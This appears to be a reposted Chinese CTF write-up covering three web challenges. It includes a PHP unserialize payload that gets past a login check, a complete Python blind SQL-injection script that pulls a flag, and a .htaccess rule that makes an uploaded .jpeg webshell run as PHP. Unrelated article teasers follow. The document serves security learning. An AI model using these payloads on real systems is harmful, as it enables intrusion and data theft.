nssctf web (3)

news2024/9/28 9:28:32

[HUBUCTF 2022 新生赛]checkin

<?php 
show_source(__FILE__);  #将当前文件的代码显示到页面
$username  = "this_is_secret"; #给username赋值
$password  = "this_is_not_known_to_you";  #给password赋值
include("flag.php");//here I changed those two   #包含flag.php
$info = isset($_GET['info'])? $_GET['info']: "" ; #通过get方法获取info参数判断是不是空,默认为空字符
$data_unserialize = unserialize($info); #将info反序列化
if ($data_unserialize['username']==$username&&$data_unserialize['password']==$password){  #判断反序列化后的info中的username和password是不是一样
    echo $flag; 
}else{
    echo "username or password error!";

}

?>
username or password error!

这里我们可以传入username和password的值为布尔值的true

那这个查询语句就一定为true

先构建数组

a:2:{s:8:"username";b:1;s:8:"password";b:1;}

这里代表创建数组里面有两个键值对 

username ==》true

password ==》 true

 

[CISCN 2019华北Day2]Web1

他提示了表和库的名字是flag

这里输入1会输出hello 通过尝试发现过滤了 union and or

所以尝试异或的sql注入脚本 

import requests
import time

url = "http://node2.anna.nssctf.cn:28302/index.php"
payload = {     #这里代表数组 键为id 值为下面的语句
	"id" : ""
} 
result = ""     
for i in range(1,100):
	l = 32      #l和r代表ascill码的起始和结束
	r =160        
	mid = (l+r)>>1   #通过二分法来猜测 通过调整l和r的值得到mid的值这里通过>>1 代表整除 在通过返回来的数据即返回hello 代表要增加l的值 如果不返回hello的字符串则减小r的值,再不断重复这个过程知道l和r的值只差1
	while(l<r):      
		payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)  #通过format 调用i和mid {0}{1}代表i和mid   ascill用来获取字符串的ascil码 substr用于提取字符串的字串
		html = requests.post(url,data=payload)  #这里通过request发送post请求 请求地址是url data内容是payload 也就是 id:0^(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid
		print(payload)
		if "Hello" in html.text:   #判断返回的页面内容里面有没有hello
			l = mid+1              #有hello 增加 这里用初始的 32 和 160 举例 就是192 也就是96 这里92返回hello 即 l等于 92+1=93
		else:
			r = mid                #还是用32 160 举例 也就是当96 没有返回hello的时候 r会变成92
		mid = (l+r)>>1             #这里代表重新给mid赋值
	if(chr(mid)==" "):             #这里代表如果猜测到最后mid的值为空格就break
		break
	result = result + chr(mid)     #通过chr是mid从ascill码变成字符串 在通过result 存放在result中 同时这里也结束了本次循环
	print(result)                  #输出result这里存在着flag
print("flag: " ,result)

[GXYCTF 2019]BabyUpload

 

上传一句话木马 发现不行 

 过滤ph 那phtml这种就不行了

发现jpeg png 都不让过猜测是对concent-Type做了过滤

 

png不行

 

发现jpeg可以但是内容不行这里写个js

 

 

 

 然后我们通过.htaccess

.htacess可以用来修改文件的后缀名

<FilesMatch "1.jpeg">   
SetHandler application/x-httpd-php
</FilesMatch>

 <FilesMatch> 标签用于为文件名匹配给定的正则表达式的文件设置配置。在这里,它将为文件名为 1.jpeg 的文件设置以下配置

SetHandler 用于设置匹配文件的处理器。在这里,将 1.jpeg 文件的处理器设置为 application/x-httpd-php

application/x-httpd-php 是PHP文件处理器,所以这行配置将使得 1.jpeg 文件由 PHP 进行解析执行

 

要改content-type

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/487222.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL数据管理

MySQL数据管理

一、MySQL数据库管理 1、库和表 行&#xff08;记录&#xff09;&#xff1a;用来描述一个对象的信息 列&#xff08;字段&#xff09;&#xff1a;用来描述对象的一个属性 2、常用的数据类型 int &#xff1a;整型 float &#xff1a;单精度浮点 4字节32位 double &…
阅读更多...
《网络安全审查办法》

《网络安全审查办法》

1发展历程 2020年4月27日&#xff0c;12部门联合发布《网络安全审查办法》&#xff0c;2020年6月1日起实施。 2021年7月10日&#xff0c;国家互联网信息办公室发布关于《网络安全审查办法&#xff08;修订草案征求意见稿&#xff09;》公开征求意见的通知。11月16日国家互联网信…
阅读更多...
【C++入门】你知道为什么C++有函数重载而C语言没有函数重载吗?

【C++入门】你知道为什么C++有函数重载而C语言没有函数重载吗?

&#x1f466;个人主页&#xff1a;Weraphael ✍&#x1f3fb;作者简介&#xff1a;目前学习C和算法 ✈️专栏&#xff1a;C航路 &#x1f40b; 希望大家多多支持&#xff0c;咱一起进步&#xff01;&#x1f601; 如果文章对你有帮助的话 欢迎 评论&#x1f4ac; 点赞&#x1…
阅读更多...
《最强Android书 架构大剖析》读书笔记

《最强Android书 架构大剖析》读书笔记

文章目录 第一章 Android 体系结构的变革之路1.2 Android系统源码目录与Linux的异同Android的框架原生二进制可执行文件Android 的原生库核心(core)库用以支持框架的库硬件抽象层Linux内核不带上层 UI界面的Android 第二章 Android 的分区和文件系统2.1 分区架构实验:从设备中获…
阅读更多...
ffmpeg学习日记513-源码-configure_filtergraph()函数分析及功能

ffmpeg学习日记513-源码-configure_filtergraph()函数分析及功能

Date: 12/04/2023 Hours: Details:template_tags 文章目录 源码版本实现文件函数原型参数释义函数功能函数分析filtergraph_is_simple函数 总结参考 源码版本 ffmpeg-4.1.10 实现文件 fftools/ffmpeg_filter.c 函数原型 int configure_filtergraph(FilterGraph *fg)参数释…
阅读更多...
重识三只松鼠:“二次创业”的新变革,“深蹲起跳”的新动能

重识三只松鼠:“二次创业”的新变革,“深蹲起跳”的新动能

“羚羊明白它必须跑得比狮子快&#xff0c;不然它会被狮子吃掉&#xff1b;每天早晨狮子醒来&#xff0c;狮子也明白它必须赛过跑得最慢的羚羊&#xff0c;不然它会活活饿死。不论你是狮子还是羚羊&#xff0c;都不重要……重要的是每天旭日东升&#xff0c;你就得开始奔跑&…
阅读更多...
突破经典网格特征?AutoFocusFormer: Image Segmentation off the Grid 论文阅读笔记

突破经典网格特征?AutoFocusFormer: Image Segmentation off the Grid 论文阅读笔记

突破经典网格特征&#xff1f;AutoFocusFormer: Image Segmentation off the Grid 论文阅读笔记 一、Abstract二、引言三、相关工作视觉 Transformer Backbones基于聚类的注意力自适应下采样点云网络 四、方法4.1 聚类和区域4.1.1 平衡聚类4.1.2 聚类的区域 写在前面 这一周赶上…
阅读更多...
【五一创作】Visual Studio常用调试技巧的温习

【五一创作】Visual Studio常用调试技巧的温习

当你在编写C程序时&#xff0c;难免会遇到代码出现错误的情况。这时候就需要用调试工具来定位问题并解决它。以下是一些在Visual Studio中使用调试器时常用的技巧&#xff0c;权当作温故总结罢~ 1. 断点 断点是调试中最为基本但也最常用的技巧之一。通过在需要定位的代码行上打…
阅读更多...
一文搞懂 x64 IA-64 AMD64 Inte64 IA-32e 架构之间的关系

一文搞懂 x64 IA-64 AMD64 Inte64 IA-32e 架构之间的关系

想要搞清楚 x64、IA64、AMD64 指令集之间的关系&#xff0c;就要先了解 Intel 和 AMD 这两家公司在生产处理器上的发展历史。 x86 处理器 1978年 Intel 生产了它的第一款 16bit 处理器8086&#xff0c;之后几款处理器名字也都以86结尾&#xff0c;包括80186&#xff0c;80286&a…
阅读更多...
五一长假暴露了电动爹的真面目,而新能源汽车市场似乎也到了转折点

五一长假暴露了电动爹的真面目,而新能源汽车市场似乎也到了转折点

4月份国内市场汽车销量数据已经出炉&#xff0c;同比来说仍然保持了很高的增长&#xff0c;不过环比数据却显示出新能源汽车市场似乎已到了转折点&#xff0c;繁荣期似乎已经结束&#xff0c;淘汰赛开始了。 一、五一长假再次暴露了电动爹的真面目 新能源汽车长途旅行首先就是怕…
阅读更多...
部署LVS-DR集群

部署LVS-DR集群

引言 一、LVS-DR工作原理 LVS-DR&#xff08;Linux Virtual Server Director Server&#xff09;工作模式&#xff0c;是生产环境中最常用的一 种工作模式。 LVS-DR 模式&#xff0c;Director Server 作为群集的访问入口&#xff0c;不作为网关使用节点 Director Server 与 …
阅读更多...
推荐算法实战项目:DeepFM 原理以及案例实战(附完整 Python 代码)

推荐算法实战项目:DeepFM 原理以及案例实战(附完整 Python 代码)

本文要介绍的是由哈尔滨工业大学联合华为发表论文《DeepFM: A Factorization-Machine based Neural Network for CTR Prediction》中提出的DeepFM模型。其实根据名字可以看出来&#xff0c;此模型包含Deep和FM两个部分。其中Deep部分就是普通的深度神经网络&#xff0c;FM是因子…
阅读更多...
【图像处理】墨西哥小波和带通滤波

【图像处理】墨西哥小波和带通滤波

一、说明 在连续小波的家族当中&#xff0c;埃尔米特小波是个非常特别的存在&#xff08;应用在连续小波转换称作埃尔米特转换&#xff09;。Ricker子波计算电动力学的广谱源项。它通常只在美国才会被称作墨西哥帽小波&#xff0c;因为在作为核函数处理2维图像时&#xff0c;形…
阅读更多...
推荐算法实战项目:NFM 原理以及案例实战(附完整 Python 代码)

推荐算法实战项目:NFM 原理以及案例实战(附完整 Python 代码)

本文要介绍的是由新加坡国立大学的研究人员在论文《Neural Factorization Machines for Sparse Predictive Analytics∗》中提出的NFM模型。 NFM模型全称是Neural Factorization Machines&#xff0c;通过名字也可以看出&#xff0c;这又是一个基于FM模型改进得到的网络。无论…
阅读更多...
SpringBoot+vue文件上传下载预览大文件分片上传文件上传进度

SpringBoot+vue文件上传下载预览大文件分片上传文件上传进度

文章目录 学习链接上传文件前端后端代码 下载文件a标签下载前端代码后台代码 动态a标签下载前端代码 axios 动态a标签前端代码 浏览器直接输入 预览文件前端代码后端代码 分片上传前后端分别md5加密spark-md5commons-codec 分片上传实现前端代码后端代码 学习链接 Blob &…
阅读更多...
zynq基于XDMA实现PCIE X8视频采集卡 提供工程源码和QT上位机程序和技术支持

zynq基于XDMA实现PCIE X8视频采集卡 提供工程源码和QT上位机程序和技术支持

目录 1、前言2、我已有的PCIE方案3、基于zynq架构的PCIE4、总体设计思路和方案视频输入通路视频输出通路PCIE输出上位机通路 5、vivado工程详解6、SDK 工程详解7、驱动安装8、QT上位机软件9、上板调试验证10、福利&#xff1a;工程代码的获取 1、前言 PCIE&#xff08;PCI Exp…
阅读更多...
智能无人蜂群作战系统适应性进化模型仿真研究

智能无人蜂群作战系统适应性进化模型仿真研究

源自&#xff1a;系统仿真学报 作者&#xff1a;李志强, 李元龙, 殷来祥, 马向平 摘 要 智能无人蜂群作战系统主要由有限行为能力的大规模作战个体组成&#xff0c;一般不具备应对复杂战场环境和作战对手变化的适应能力。采用遗传算法与增强学习相结合的方法探索构建基于个体…
阅读更多...
Apache Flink (最新版本) 远程代码执行

Apache Flink (最新版本) 远程代码执行

路虽远&#xff0c;行则将至&#xff1b;事虽难&#xff0c;做则必成 Apache Flink < 1.9.1(最新版本) 远程代码执行 CVE-2020-17518 漏洞描述 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 漏洞影响 Apache Flink < 1.9.1(最新…
阅读更多...
通过频谱规划软件摆脱频谱监测硬件限制

通过频谱规划软件摆脱频谱监测硬件限制

背景 随着无线通信技术的发展,电磁频谱被逐渐扩充&#xff0c;从几kHz到1THz的频段慢慢被各种技术填充与覆盖。在任意时刻任意地点&#xff0c;5G、WiFi、GNSS、广播电台、航空通信等&#xff0c;都离不开无线通信。 电磁频谱&#xff08;EMS&#xff09;被广泛用于生活中&am…
阅读更多...
基于matlab使用均匀矩形阵列进行电子扫描

基于matlab使用均匀矩形阵列进行电子扫描

一、前言 本示例模拟定期扫描预定义监视区域的相控阵雷达。该单基地雷达使用900元件矩形阵列。介绍了根据规范推导雷达参数的步骤。合成接收到的脉冲后&#xff0c;进行检测和距离估计。最后&#xff0c;利用多普勒估计得到每个目标的速度。 二、雷达定义 首先&#xff0c;我们…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023